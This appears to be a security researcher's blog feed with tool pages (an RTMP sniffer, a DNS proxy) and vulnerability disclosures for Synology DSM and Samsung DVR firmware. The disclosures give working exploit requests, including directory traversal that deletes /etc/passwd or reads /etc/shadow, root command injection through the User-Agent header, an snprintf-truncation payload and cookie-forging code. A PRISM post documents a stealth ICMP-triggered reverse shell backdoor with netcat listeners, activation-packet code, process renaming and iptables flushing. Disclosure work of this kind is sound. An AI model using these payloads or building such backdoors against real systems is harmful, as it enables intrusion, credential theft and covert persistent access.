Using the script with docker makes it also possible to run the script even on windows machines.
To use a proxy, just set the mentioned environment variables via the docker -e parameter.
Related projects
thunar-dropbox: A simple extension to Dropbox Uploader that provides a convenient method to share your Dropbox files with one click!
Donations
If you want to support this project, please consider donating:
PayPal: https://www.paypal.me/AndreaFabrizi83
BTC: 1JHCGAMpKqUwBjcT3Kno9Wd5z16K6WKPqG
rtmpSnoop2014-06-01T14:00:00+02:002014-06-01T14:00:00+02:00https://www.andreafabrizi.it/2014/06/01/RTMPSnoop<h1 id="rtmpsnoop---the-rtmp-sniffer">rtmpSnoop - The RTMP sniffer!</h1>
<p><strong>rtmpSnoop</strong> lets you sniff RTMP streams from live TV, online channels and streaming services and dump the RTMP properties in many formats.
You can analyse both live and dumped streams.</p>
<p>You can take a look at the <a href="https://github.com/andreafabrizi/rtmpSnoop/">GitHub project page</a></p>
<h2 id="features">Features</h2>
<ul>
<li>Live sniffing from one or more interfaces</li>
<li>Read dumped streams from PCAP files</li>
<li>Dump the RTMP properties in several formats (simple list, m3u entry or rtmpdump syntax)</li>
<li>Easy to use and cross platform!</li>
</ul>
<h2 id="requirements">Requirements</h2>
<p><strong>rtmpSnoop</strong> works on both Windows and Unix.<br />
To run it you only need Python (at least version 2.7) and the scapy module.</p>
<p><strong>Linux Installation</strong></p>
<ul>
<li>
<p>Debian/Ubuntu:<br />
<code class="highlighter-rouge">apt-get install python-scapy</code></p>
</li>
<li>
<p>RedHat/Centos:<br />
<code class="highlighter-rouge">yum install scapy.noarch</code><br />
<code class="highlighter-rouge">yum install python-argparse.noarch</code></p>
</li>
</ul>
<p><strong>Mac Installation</strong></p>
<ul>
<li>Download pcapy from http://corelabs.coresecurity.com/</li>
<li>Download dnet from http://libdnet.sourceforge.net/</li>
</ul>
<p>Unzip the dnet archive, cd into it, then:</p>
<div class="highlighter-rouge"><pre class="highlight"><code> CFLAGS='-arch i386 -arch x86_64' ./configure --prefix=/usr
archargs='-arch i386 -arch x86_64' make
sudo make install
cd python
sudo python setup.py install
</code></pre>
</div>
<p><strong>Windows Installation</strong><br />
Follow this guide to install the scapy module on Windows:
http://www.secdev.org/projects/scapy/doc/installation.html#windows</p>
<h2 id="get-the-code">Get the code</h2>
<div class="highlighter-rouge"><pre class="highlight"><code>git clone https://github.com/andreafabrizi/rtmpSnoop.git
</code></pre>
</div>
<h2 id="usage">Usage</h2>
<p>The syntax is quite simple:</p>
<div class="highlighter-rouge"><pre class="highlight"><code>$python rtmpSnoop.py -h
usage: rtmpSnoop.py [-h] [-i DEVICE | -f PCAPFILE]
[--out-list | --out-m3u | --out-rtmpdump] [-p PORT]
[--one] [--quiet] [--debug]
rtmpSnoop lets you to grab the RTMP properties from live or dumped streams.
optional arguments:
-h, --help show this help message and exit
Input:
-i DEVICE Device to sniff on (Default: sniffs on all devices)
-f PCAPFILE PCAP file to read from
Output format:
--out-list Prints the RTMP data as list (Default)
--out-m3u Prints the RTMP data as m3u entry
--out-rtmpdump Prints the RTMP data in the rtmpdump format
Additional options:
-p PORT RTMP port (Default: sniffs on all ports)
--one Quit after the first stream found
--quiet Doesn't print anything except the RTMP output
--debug Enable DEBUG mode
</code></pre>
</div>
<h2 id="examples">Examples</h2>
<p>Sniffing on all interfaces, without filters:</p>
<div class="highlighter-rouge"><pre class="highlight"><code>sudo python rtmpSnoop.py
</code></pre>
</div>
<p>Sniffing on eth0, and looking for RTMP streams on port 1935 only:</p>
<div class="highlighter-rouge"><pre class="highlight"><code>sudo python rtmpSnoop.py -i eth0 -p 1935
</code></pre>
</div>
<p>Reading streams from PCAP file:</p>
<div class="highlighter-rouge"><pre class="highlight"><code>python rtmpSnoop.py -f dump/tv.pcap
</code></pre>
</div>
<h2 id="output-formats">Output formats</h2>
<p>Default list:</p>
<div class="highlighter-rouge"><pre class="highlight"><code>url: rtmp://192.168.1.1/live/channel?id=123
app: live
pageUrl: http://www.test.com/embedded/channel/1/500/380
swfUrl: http://www.test.eu/static/player.swf
tcUrl: rtmp://192.168.1.1/live
playPath: channel?id=123
flashVer: LNX 11,7,700,203
extra: S:OK
</code></pre>
</div>
<p>m3u entry:</p>
<div class="highlighter-rouge"><pre class="highlight"><code>#EXTINF:0,1, Stream
rtmp://192.168.1.1/live/channel?id=12345 app=live pageUrl=http://www.test.eu/embedded/channel/1/500/380
swfUrl=http://www.test.eu/static/player.swf tcUrl=rtmp://192.168.1.1/live playPath=channel?id=123 conn=S:OK live=1
</code></pre>
</div>
<p>rtmpdump syntax:</p>
<div class="highlighter-rouge"><pre class="highlight"><code>rtmpdump -r 'rtmp://192.168.1.1/live/channel?id=12345' -a 'live' -t 'rtmp://192.168.1.1/live'
-y 'channel?id=12345' -W 'http://www.test.eu/scripts/player.swf' -p 'http://www.test.eu/embedded/channel/1/500/380'
-f 'LNX 11,7,700,203' -C S:OK --live -o stream.flv
</code></pre>
</div>
<h2 id="donations">Donations</h2>
<p>If you want to support this project, please consider donating:</p>
<ul>
<li>PayPal: andrea.fabrizi@gmail.com</li>
<li>BTC: 1JHCGAMpKqUwBjcT3Kno9Wd5z16K6WKPqG</li>
</ul>Andrea Fabrizi
Synology DSM vulnerability2013-12-20T13:00:00+01:002013-12-20T13:00:00+01:00https://www.andreafabrizi.it/2013/12/20/Synology DSM vulnerability<p>I’m again here with a Synology DSM vulnerability.</p>
<p>Synology DiskStation Manager (DSM) is a Linux-based operating system, used for the DiskStation and RackStation products.</p>
<p>I found a number of directory traversal vulnerabilities in the FileBrowser components (DSM version <= 4.3-3810).
This kind of vulnerability allows any authenticated user, even a non-administrative one, to access, create, delete and modify system and configuration files.</p>
<p>The only countermeasure implemented against this vulnerability is a check that the path starts with a valid shared folder, so it is enough to put a “../” straight after it to bypass the security check.</p>
<p>Vulnerable CGIs:</p>
<ul>
<li>/webapi/FileStation/html5_upload.cgi</li>
<li>/webapi/FileStation/file_delete.cgi</li>
<li>/webapi/FileStation/file_download.cgi</li>
<li>/webapi/FileStation/file_sharing.cgi</li>
<li>/webapi/FileStation/file_share.cgi</li>
<li>/webapi/FileStation/file_MVCP.cgi</li>
<li>/webapi/FileStation/file_rename.cgi</li>
</ul>
<p>I haven’t tested all the CGIs, but I suspect that many others are vulnerable, so don’t take this list as comprehensive.</p>
<p>Here are some examples (“test” is a valid shared folder name):</p>
<h3 id="delete-etcpasswd">Delete /etc/passwd</h3>
<div class="highlighter-rouge"><pre class="highlight"><code>POST /webapi/FileStation/file_delete.cgi HTTP/1.1
Host: 192.168.56.101:5000
X-SYNO-TOKEN: XXXXXXXX
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 103
Cookie: stay_login=0; id=kjuYI0HvD92m6
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
path=/test/../../etc/passwd&accurate_progress=true&api=SYNO.FileStation.Delete&method=start&version=1
</code></pre>
</div>
<h3 id="arbitrary-file-download">Arbitrary file download</h3>
<div class="highlighter-rouge"><pre class="highlight"><code>GET /fbdownload/?dlink=2f746573742f2e2e2f2e2e2f6574632f706173737764 HTTP/1.1
Host: 192.168.56.101:5000
Connection: keep-alive
Authorization: Basic XXXXXXXX
</code></pre>
</div>
<p>2f746573742f2e2e2f2e2e2f6574632f706173737764 -> /test/../../etc/passwd</p>
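<p>The encoding used by the dlink parameter is plain ASCII-to-hex, so a traversal payload can be prepared in a couple of lines of Python (a sketch; the helper names are mine, not part of DSM):</p>

```python
def encode_dlink(path: str) -> str:
    # The fbdownload "dlink" parameter is just the ASCII path, hex encoded
    return path.encode("ascii").hex()

def decode_dlink(dlink: str) -> str:
    # Reverse operation, useful to inspect captured dlink values
    return bytes.fromhex(dlink).decode("ascii")

# The traversal payload from the example above
print(encode_dlink("/test/../../etc/passwd"))
# -> 2f746573742f2e2e2f2e2e2f6574632f706173737764
```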
<h3 id="remote-file-list">Remote file list</h3>
<div class="highlighter-rouge"><pre class="highlight"><code>POST /webapi/FileStation/file_share.cgi HTTP/1.1
Host: 192.168.56.101:5000
X-SYNO-TOKEN: XXXXXXXX
Content-Length: 75
Cookie: stay_login=0; id=f9EThJSyRaqJM; BCSI-CS-36db57a1c38ce2f6=2
folder_path=/test/../../tmp&api=SYNO.FileStation.List&method=list&version=1
</code></pre>
</div>
<h2 id="timeline">Timeline</h2>
<ul>
<li>05/12/2013: First contact with the vendor</li>
<li>06/12/2013: Vulnerability details sent to the vendor</li>
<li>20/12/2013: Patch released by the vendor</li>
</ul>Andrea FabriziI’m again here with a Synology DSM vulnerability.Synology DSM multiple vulnerabilities2013-09-10T14:00:00+02:002013-09-10T14:00:00+02:00https://www.andreafabrizi.it/2013/09/10/Synology DSM multiple vulnerabilities<p>Synology DiskStation Manager (DSM) is a Linux-based operating system, used for the DiskStation and RackStation products.</p>
<p>Versions <= 4.3-3776 are affected by multiple vulnerabilities.</p>
<h2 id="remote-file-download">Remote file download</h2>
<p>Any authenticated user, even with the lowest privileges, can download any system file, including <code class="highlighter-rouge">/etc/shadow</code>, samba password files and files owned by other DSM users, without any restriction.</p>
<p>The vulnerability is located in <code class="highlighter-rouge">/webman/wallpaper.cgi</code>. The CGI takes as parameter the full path of the image to download, encoded in ASCII hex format.
The problem is that any file type can be downloaded (not only images) and the path validation is very poor. In fact the CGI only checks whether the path starts with an allowed directory (like /usr/syno/synoman/webman), and this kind of protection can be easily bypassed using a dot-dot attack.</p>
<p>For example to access the <code class="highlighter-rouge">/etc/shadow</code> just encode the path as <code class="highlighter-rouge">2f7573722f73796e6f2f73796e6f6d616e2f7765626d616e2f2e2e2f2e2e2f2e2e2f2e2e2f6574632f736861646f77</code> (/usr/syno/synoman/webman/../../../../etc/shadow)</p>
<div class="highlighter-rouge"><pre class="highlight"><code>GET /webman/wallpaper.cgi?path=AABBCCDDEEFF11223344 HTTP/1.1
Host: 127.0.0.1:5000
Cookie: stay_login=0; id=XXXXXXXXXXX
</code></pre>
</div>
<h2 id="command-injection">Command injection</h2>
<p>A command injection vulnerability, on the <code class="highlighter-rouge">/webman/modules/ControlPanel/modules/externaldevices.cgi</code> CGI, allows any administrative user to execute arbitrary commands on the system, with root privileges.</p>
<div class="highlighter-rouge"><pre class="highlight"><code>POST /webman/modules/ControlPanel/modules/externaldevices.cgi HTTP/1.1
Host: 127.0.0.1:5000
User-Agent: ls
Cookie: stay_login=0; id=XXXXXXXXXXX
Content-Length: 128
action=apply&device_name=aa&printerid=1.1.1.1-aa';$HTTP_USER_AGENT>/tmp/output+%23&printer_mode=netPrinter&eject_netprinter=true
</code></pre>
</div>
<p>Put the command to execute in the User-Agent string; after the request, the output will be available in the <code class="highlighter-rouge">/tmp/output</code> file.</p>
<h2 id="partial-remote-content-download">Partial remote content download</h2>
<p>For localization, DSM uses a few CGIs, which take a lang parameter (e.g. “enu” for English) and return a JSON object containing the localized strings in a dictionary format.</p>
<p>The strings are taken from a local file with the following path: <code class="highlighter-rouge">[current_dir]/texts/[lang_parameter_value]/strings</code></p>
<p>The <code class="highlighter-rouge">/strings</code> appended at the end of the path prevents a path injection, because any value injected using the “lang” parameter will be invalidated (in other words, it’s possible to read only files named <code class="highlighter-rouge">strings</code>). But the interesting thing is that the full path of the strings files is built using an snprintf call like this:</p>
<div class="highlighter-rouge"><pre class="highlight"><code>snprintf(&s, 0x80u, "texts/%s/strings", lang)
</code></pre>
</div>
<p>This means that, with a lang value big enough, it’s possible to exceed the 128 bytes allowed by the snprintf and cut the <code class="highlighter-rouge">/strings</code> suffix out of the built path.</p>
<p>For example, the lang value <code class="highlighter-rouge">.///////////////////////////////////////////////////////////////////// ///////////////////../../../../../etc/synoinfo.conf</code> allows getting the <code class="highlighter-rouge">/etc/synoinfo.conf</code> file content.</p>
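<p>The truncation can be reproduced without touching the binary. Here is a short Python sketch of the effect (emulating snprintf’s bounded write; the 0x80 buffer size comes from the decompiled call above, the padding arithmetic is mine):</p>

```python
BUF_SIZE = 0x80  # same limit as the snprintf call above

def build_strings_path(lang: str) -> str:
    # Emulates snprintf(&s, 0x80, "texts/%s/strings", lang):
    # at most BUF_SIZE - 1 characters are kept, the rest is cut off
    return ("texts/%s/strings" % lang)[: BUF_SIZE - 1]

# Pad lang so the built path fills the buffer exactly where we want:
# "texts/" (6 chars) + padding + traversal = 127 chars, dropping "/strings"
traversal = "../../../../etc/synoinfo.conf"
lang = "/" * (BUF_SIZE - 1 - len("texts/") - len(traversal)) + traversal

path = build_strings_path(lang)
assert not path.endswith("/strings")       # suffix truncated away
assert path.endswith("etc/synoinfo.conf")  # attacker-controlled target
```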
<p>The second problem is that the input file read by the CGI must be formatted in a key/value way: <code class="highlighter-rouge">key1=string1</code></p>
<p>In other words, to get some content from a generic file it’s necessary that the file contains at least one “=” on each line (this is the reason why I called the vulnerability “Partial remote content download”).</p>
<p>At first glance it may seem very limiting but, given that it’s possible to read directly from the disk block device (e.g. /dev/vg1000/lv), the amount of data that can be dumped is huge. In my tests I was able to dump around 25-30% of the drive (tested with mixed content, like documents, images and generic files). It’s possible to dump data from any connected drive. Interesting data can also be dumped from the /proc vfs.</p>
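<p>Why only part of a file survives is easy to see: the CGI keeps only lines it can parse as key/value pairs. The sketch below is my own illustration of that effect, not DSM’s actual parser:</p>

```python
def parse_strings(data: str) -> dict:
    # Only lines containing '=' produce an entry in the returned
    # dictionary; everything else is silently dropped, which is why
    # the dump of an arbitrary file is only partial
    pairs = {}
    for line in data.splitlines():
        if "=" in line:
            key, _, value = line.partition("=")
            pairs[key] = value
    return pairs

sample = "PATH=/usr/bin\nthis line is lost\nkernel.hostname=diskstation"
print(parse_strings(sample))
# {'PATH': '/usr/bin', 'kernel.hostname': 'diskstation'}
```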
<p>This vulnerability impacts two different CGIs and is exploitable without authentication by any remote user:</p>
<ul>
<li>/scripts/uistrings.cgi</li>
<li>/webfm/webUI/uistrings.cgi</li>
</ul>
<div class="highlighter-rouge"><pre class="highlight"><code>GET /scripts/uistrings.cgi?lang=XXXXXXXXX HTTP/1.1
Host: 127.0.0.1:5000
</code></pre>
</div>
<p>There are two other uistrings.cgi files in the system, but they are not affected.</p>
<h2 id="xss">XSS</h2>
<p>A classic cross-site scripting vulnerability affects the following CGI:</p>
<div class="highlighter-rouge"><pre class="highlight"><code>/webman/info.cgi?host=XXXX&target=XXXX&add=XXXX
</code></pre>
</div>Andrea FabriziSynology DiskStation Manager (DSM) is a Linux-based operating system, used for the DiskStation and RackStation products.Samsung DVR vulnerability2013-08-20T14:00:00+02:002013-08-20T14:00:00+02:00https://www.andreafabrizi.it/2013/08/20/Samsung DVR vulnerability<p>Samsung provides a wide range of DVR products, all running nearly the same firmware. The vulnerable firmware, version <= 1.10, is an embedded Linux system that exposes a web interface through the lighttpd webserver and CGI pages.</p>
<p>The authenticated session is tracked using two cookies, called <code class="highlighter-rouge">DATA1</code> and <code class="highlighter-rouge">DATA2</code>, containing respectively the base64-encoded username and password. So, the first piece of advice for the developers: don’t put user credentials into cookies!</p>
<p>Anyway, the critical vulnerability is that in most of the CGIs the session check is performed incorrectly, which allows access to protected pages simply by putting an arbitrary cookie into the HTTP request. Yes, that’s all.</p>
<p>This vulnerability allows remote unauthenticated users to:</p>
<ul>
<li>Get/set/delete username/password of local users (/cgi-bin/setup_user)</li>
<li>Get/set DVR/Camera general configuration</li>
<li>Get info about the device/storage</li>
<li>Get/set the NTP server</li>
<li>Get/set many other settings</li>
</ul>
<p>Vulnerable CGIs:</p>
<ul>
<li>/cgi-bin/camera_privacy_area</li>
<li>/cgi-bin/dev_camera</li>
<li>/cgi-bin/dev_devinfo</li>
<li>/cgi-bin/dev_devinfo2</li>
<li>/cgi-bin/dev_hddalarm</li>
<li>/cgi-bin/dev_modechange</li>
<li>/cgi-bin/dev_monitor</li>
<li>/cgi-bin/dev_pos</li>
<li>/cgi-bin/dev_ptz</li>
<li>/cgi-bin/dev_remote</li>
<li>/cgi-bin/dev_spotout</li>
<li>/cgi-bin/event_alarmsched</li>
<li>/cgi-bin/event_motion_area</li>
<li>/cgi-bin/event_motiondetect</li>
<li>/cgi-bin/event_sensordetect</li>
<li>/cgi-bin/event_tamper</li>
<li>/cgi-bin/event_vldetect</li>
<li>/cgi-bin/net_callback</li>
<li>/cgi-bin/net_connmode</li>
<li>/cgi-bin/net_ddns</li>
<li>/cgi-bin/net_event</li>
<li>/cgi-bin/net_group</li>
<li>/cgi-bin/net_imagetrans</li>
<li>/cgi-bin/net_recipient</li>
<li>/cgi-bin/net_server</li>
<li>/cgi-bin/net_snmp</li>
<li>/cgi-bin/net_transprotocol</li>
<li>/cgi-bin/net_user</li>
<li>/cgi-bin/rec_event</li>
<li>/cgi-bin/rec_eventrecduration</li>
<li>/cgi-bin/rec_normal</li>
<li>/cgi-bin/rec_recopt</li>
<li>/cgi-bin/rec_recsched</li>
<li>/cgi-bin/restart_page</li>
<li>/cgi-bin/setup_admin_setup</li>
<li>/cgi-bin/setup_datetimelang</li>
<li>/cgi-bin/setup_group</li>
<li>/cgi-bin/setup_holiday</li>
<li>/cgi-bin/setup_ntp</li>
<li>/cgi-bin/setup_systeminfo</li>
<li>/cgi-bin/setup_user</li>
<li>/cgi-bin/setup_userpwd</li>
<li>/cgi-bin/webviewer</li>
</ul>
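<p>Since DATA1 and DATA2 are only the base64-encoded username and password, a “session” can be fabricated offline; and because the check is broken, the values don’t even have to decode to valid credentials. A sketch (the helper name is mine):</p>

```python
import base64

def make_session_cookies(username: str, password: str) -> dict:
    # DATA1/DATA2 carry the base64-encoded username and password
    return {
        "DATA1": base64.b64encode(username.encode()).decode(),
        "DATA2": base64.b64encode(password.encode()).decode(),
    }

print(make_session_cookies("admin", "secret"))
# {'DATA1': 'YWRtaW4=', 'DATA2': 'c2VjcmV0'}

# Because of the broken session check, even this passes:
cookie_header = "DATA1=anything; DATA2=anything"
```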
<p>PoC exploit to list device users and passwords <a href="/files/samsung_dvr.py">here</a></p>Andrea FabriziSamsung provides a wide range of DVR products, all running nearly the same firmware. The vulnerable firmware, version <= 1.10, is an embedded Linux system that exposes a web interface through the lighttpd webserver and CGI pages.DNS Proxy2013-05-17T14:00:00+02:002013-05-17T14:00:00+02:00https://www.andreafabrizi.it/2013/05/17/DNSProxy<h1 id="dns-proxy">DNS Proxy</h1>
<p>DNS proxy listens for incoming DNS requests on the local interface and
resolves remote hosts using an external PHP script, through HTTP proxy requests.</p>
<p>If you can’t use VPN, UDP tunnels or other methods to resolve external names
in your LAN, DNS proxy is a good and simple solution.</p>
<p>The source code is hosted on <a href="https://github.com/andreafabrizi/DNSProxy/">GitHub</a></p>
<h2 id="get-the-code">Get the code</h2>
<div class="highlighter-rouge"><pre class="highlight"><code>git clone https://github.com/andreafabrizi/DNSProxy.git
</code></pre>
</div>
<h2 id="build">Build</h2>
<p>For Debian/Ubuntu users:<br />
<code class="highlighter-rouge">apt-get install libcurl4-openssl-dev</code></p>
<p>then</p>
<p><code class="highlighter-rouge">make</code></p>
<h2 id="usage">Usage</h2>
<div class="language-bash highlighter-rouge"><pre class="highlight"><code>dnsp -l 127.0.0.1 -h 10.0.0.2 -r 8080 -s http://www.andreafabrizi.it/nslookup.php
</code></pre>
</div>
<p>In this case, DNS proxy listens on port 53 (bind on 127.0.0.1) and sends the
requests to external script through the 10.0.0.2:8080 proxy.</p>
<p><strong>IMPORTANT:</strong> Please don’t use the script hosted on my server, it’s for testing purposes only.
Instead, host the nslookup.php script on your own server or use a free hosting service. Thanks!</p>
<div class="language-bash highlighter-rouge"><pre class="highlight"><code> dnsp 0.5
usage: dnsp -l <span class="o">[</span>local_host] -h <span class="o">[</span>proxy_host] -r <span class="o">[</span>proxy_port] -s <span class="o">[</span>lookup_script]
OPTIONS:
-v Enable DEBUG mode
-p Local port
-l Local host
-r Proxy port
-h Proxy host
-u Proxy username <span class="o">(</span>optional<span class="o">)</span>
-k Proxy password <span class="o">(</span>optional<span class="o">)</span>
-s Lookup script URL
</code></pre>
</div>
<h2 id="testing">Testing</h2>
<p>To test if DNS proxy is working correctly, first run the program as following (replace the placeholders with the correct proxy IP and port!):</p>
<div class="language-bash highlighter-rouge"><pre class="highlight"><code>dnsp -l 127.0.0.1 -h x.x.x.x -r nnnn -s http://www.andreafabrizi.it/nslookup.php
</code></pre>
</div>
<p>then, try to resolve a hostname using the <strong>dig</strong> command:</p>
<div class="language-bash highlighter-rouge"><pre class="highlight"><code>dig www.google.com @127.0.0.1
</code></pre>
</div>
<p>The result should be something like this:</p>
<div class="highlighter-rouge"><pre class="highlight"><code>; <<>> DiG 9.8.1-P1 <<>> www.google.com @127.0.0.1
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 29155
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 0
;; QUESTION SECTION:
;www.google.com. IN A
;; ANSWER SECTION:
www.google.com. 3600 IN A 173.194.64.106
;; Query time: 325 msec
;; SERVER: 127.0.0.1#53(127.0.0.1)
;; WHEN: Fri May 17 11:52:08 2013
;; MSG SIZE rcvd: 48
</code></pre>
</div>
<h2 id="changelog">Changelog</h2>
<p>Version 0.5 - May 17 2013:</p>
<ul>
<li>Add proxy authentication support</li>
<li>port option is now optional (default is 53)</li>
<li>Fixed compilation error</li>
<li>Minor bug fixes</li>
</ul>
<p>Version 0.4 - November 16 2009:</p>
<ul>
<li>Now using libCurl for http requests</li>
<li>Implemented concurrent DNS server</li>
<li>Bug fixes</li>
<li>Code clean</li>
</ul>
<p>Version 0.1 - April 09 2009:</p>
<ul>
<li>Initial release</li>
</ul>Andrea Fabrizi
PRISM backdoor2013-04-18T14:00:00+02:002013-04-18T14:00:00+02:00https://www.andreafabrizi.it/2013/04/18/Prism<h1 id="prism-backdoor">Prism backdoor</h1>
<p>PRISM is a user-space stealth reverse shell backdoor. The code is available on <a href="https://github.com/andreafabrizi/prism">GitHub</a>.</p>
<p>It has been fully tested on:</p>
<ul>
<li><strong>Linux</strong></li>
<li><strong>Solaris</strong></li>
<li><strong>AIX</strong></li>
<li><strong>BSD/Mac</strong></li>
<li><strong>Android</strong></li>
</ul>
<p>PRISM can work in two different modes: <strong>ICMP</strong> and <strong>STATIC</strong>.</p>
<h2 id="icmp-mode">ICMP mode</h2>
<p>Using this operation mode, the backdoor waits silently in the background for a specific ICMP packet
containing the host/port to connect back to and a private key to prevent third-party access.</p>
<ul>
<li>First, run <strong>netcat</strong> on the attacker machine to wait for incoming connection from the backdoor:
<div class="language-bash highlighter-rouge"><pre class="highlight"><code><span class="gp">$ </span>nc -l -p 6666
</code></pre>
</div>
</li>
<li>Using the <strong>sendPacket.py</strong> script (or another packet builder) send the activation packet to the backdoor:
<div class="language-bash highlighter-rouge"><pre class="highlight"><code>./sendPacket.py 192.168.0.1 p4ssw0rd 192.168.0.10 6666
</code></pre>
</div>
<p><strong>192.168.0.1</strong> is the victim machine running prism backdoor<br />
<strong>p4ssw0rd</strong> is the key<br />
<strong>192.168.0.10</strong> is the attacker machine address<br />
<strong>6666</strong> is the attacker machine port</p>
</li>
<li>The backdoor will connect back to netcat!</li>
</ul>
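<p>The activation packet is an ICMP echo request whose data field smuggles the key and connect-back address. The exact payload layout used by sendPacket.py is not shown here, so the format below is hypothetical; building a well-formed echo request with the standard RFC 792/1071 checksum looks like this:</p>

```python
import struct

def icmp_checksum(data: bytes) -> int:
    # Standard ones'-complement Internet checksum (RFC 1071)
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    total = (total >> 16) + (total & 0xFFFF)
    total += total >> 16
    return ~total & 0xFFFF

def build_activation_packet(key: str, host: str, port: int) -> bytes:
    # Hypothetical payload layout "key host port" -- the real
    # sendPacket.py format may differ
    payload = f"{key} {host} {port}".encode()
    header = struct.pack("!BBHHH", 8, 0, 0, 0x1337, 1)  # type 8 = echo request
    csum = icmp_checksum(header + payload)
    return struct.pack("!BBHHH", 8, 0, csum, 0x1337, 1) + payload

pkt = build_activation_packet("p4ssw0rd", "192.168.0.10", 6666)
assert icmp_checksum(pkt) == 0  # a correct checksum verifies to zero
```

Sending the packet would require a raw socket (root privileges); this sketch only shows how the bytes are assembled.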
<h2 id="static-mode">STATIC mode</h2>
<p>Using this operation mode, the backdoor tries to connect to a hard-coded IP/PORT.<br />
In this case, just run netcat listening on the hard-coded machine/port:</p>
<div class="language-bash highlighter-rouge"><pre class="highlight"><code> <span class="nv">$ </span>nc -l -p <span class="o">[</span>PORT]
</code></pre>
</div>
<h2 id="features">Features</h2>
<ul>
<li>Two operating modes (ICMP and STATIC)</li>
<li>Runtime process renaming</li>
<li>No listening ports</li>
<li>Automatic iptables rules flushing</li>
<li>Written in pure C</li>
<li>No library dependencies</li>
</ul>
<h2 id="get-the-code">Get the code</h2>
<div class="highlighter-rouge"><pre class="highlight"><code>git clone https://github.com/andreafabrizi/prism.git
</code></pre>
</div>
<h2 id="configuration">Configuration</h2>
<p>Before building, you have to configure the backdoor by editing the source code.<br />
The configuration parameters are described below:</p>
<p><strong>STATIC mode:</strong><br />
<em>REVERSE_HOST</em>: Machine address to connect back<br />
<em>REVERSE_PORT</em>: Machine port to connect back<br />
<em>RESPAWN_DELAY</em>: Time, in seconds, between each connection</p>
<p><strong>ICMP mode:</strong><br />
<em>ICMP_KEY</em>: Key/Password to activate the backdoor</p>
<p><strong>Generic parameters:</strong><br />
<em>MOTD</em>: Message to be printed at the backdoor connection<br />
<em>SHELL</em>: Shell to execute<br />
<em>PROCESS_NAME</em>: Fake process name</p>
<h2 id="building">Building</h2>
<p><code class="highlighter-rouge">gcc <..OPTIONS..> -Wall -s -o prism prism.c</code></p>
<p>Available GCC options:<br />
<strong>-DDETACH</strong> #Run the process in background<br />
<strong>-DSTATIC</strong> #Enable STATIC mode (default is the ICMP mode)<br />
<strong>-DNORENAME</strong> #Doesn’t rename the process<br />
<strong>-DIPTABLES</strong> #Try to flush all iptables rules</p>
<p>Example:<br />
<code class="highlighter-rouge">gcc -DDETACH -DNORENAME -Wall -s -o prism prism.c</code></p>
<h2 id="cross-compiling">Cross Compiling</h2>
<ul>
<li>
<p><strong>Android</strong><br />
Change the shell to <em>/system/bin/sh</em><br />
<code class="highlighter-rouge">apt-get install gcc-arm-linux-gnueabi</code><br />
<code class="highlighter-rouge">arm-linux-gnueabi-gcc -DSTATIC -DDETACH -DNORENAME -static -march=armv5 prism.c -o prism</code></p>
</li>
<li>
<p><strong>Linux 64bit</strong> (using a 32bit host system) <br />
<code class="highlighter-rouge">apt-get install libc6-dev-amd64</code><br />
<code class="highlighter-rouge">gcc -DDETACH -m64 -Wall -s -o prism prism.c</code></p>
</li>
<li>
<p><strong>Linux 32bit</strong> (using a 64bit host system) <br />
<code class="highlighter-rouge">apt-get install libc6-dev-i386</code><br />
<code class="highlighter-rouge">gcc -DDETACH -m32 -Wall -s -o prism prism.c</code></p>
</li>
</ul>
<h2 id="backdoor-building-information">Backdoor building information</h2>
<p>The backdoor ignores any command line parameter, except <strong>Inf0</strong> (the last character is the digit zero).<br />
This option allows you to see some information about the backdoor:</p>
<div class="language-bash highlighter-rouge"><pre class="highlight"><code><span class="gp">$ </span>./prism Inf0
Version: 0.5
Mode: icmp
Key: p455w0rD
Process name: <span class="o">[</span>udevd]
Shell: /bin/sh
Detach: Yes
Flush Iptables: No
</code></pre>
</div>Andrea FabriziPrism backdoor